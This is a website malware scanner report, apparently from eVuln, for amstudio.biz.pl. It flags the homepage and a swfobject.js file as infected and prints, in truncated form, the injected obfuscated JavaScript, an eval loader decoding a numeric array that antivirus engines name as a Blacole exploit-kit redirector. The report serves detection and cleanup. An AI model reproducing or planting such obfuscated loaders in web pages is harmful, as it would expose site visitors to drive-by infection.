Malware Scanner report for amstudio.biz.pl

Malicious/Suspicious/Total urls checked: 2/0/3

2 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.amstudio.biz.pl/	200 OK Content-Length: 6473 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=15;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,113,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,89,93,108,110,98,91,89,103,109,102 ... 779 bytes are skipped ...,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,109,84,32,56,55,38,92,98,112,57,30,33,52,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,112,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,113,32,51,6,4,27,23,24,25,119,8,1,117,34,34,36,50);s="";for(i=0;i-451!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports: AntiVir JS/iFrame.afu.12 Avast JS:Iframe-XJ [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Agent.GO K7AntiVirus Riskware Comodo TrojWare.JS.BlacoleRef.W McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.400 Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.KH MicroWorld-eScan JS:Trojan.JS.Agent.GO Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.bdetht F-Secure JS:Trojan.JS.Agent.GO F-Prot JS/Blacole.DC.gen AVG HTML/Framer Norman Agent.AMAYB GData JS:Trojan.JS.Agent.GO Commtouch JS/Blacole.DC.gen BitDefender JS:Trojan.JS.Agent.GO
http://www.amstudio.biz.pl/scripts/swfobject/swfobject.js	200 OK Content-Length: 12090 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=64;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,96,110,107,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,93,112,109,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,93,92,107,109,97,95 ... 863 bytes are skipped ...26,27,23,24,93,105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,95,114,106,84,32,56,55,38,92,98,112,57,30,33,52,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,95,114,106,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,93,112,109,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-475!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports: AntiVir JS/iFrame.afu.12 Avast JS:Iframe-XJ [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Agent.GO K7AntiVirus Riskware Comodo TrojWare.JS.BlacoleRef.W McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.400 Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.KH MicroWorld-eScan JS:Trojan.JS.Agent.GO Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.bdetht F-Secure JS:Trojan.JS.Agent.GO F-Prot JS/Blacole.DC.gen AVG HTML/Framer Norman Agent.AMAYB GData JS:Trojan.JS.Agent.GO Commtouch JS/Blacole.DC.gen BitDefender JS:Trojan.JS.Agent.GO
http://www.amstudio.biz.pl/test404page.js	404 Not Found Content-Length: 185 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: amstudio.biz.pl

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: amstudio.biz.pl
Referer: http://www.google.com/search?q=amstudio.biz.pl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=amstudio.biz.pl

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://amstudio.biz.pl/

Result: amstudio.biz.pl is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for amstudio.biz.pl

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools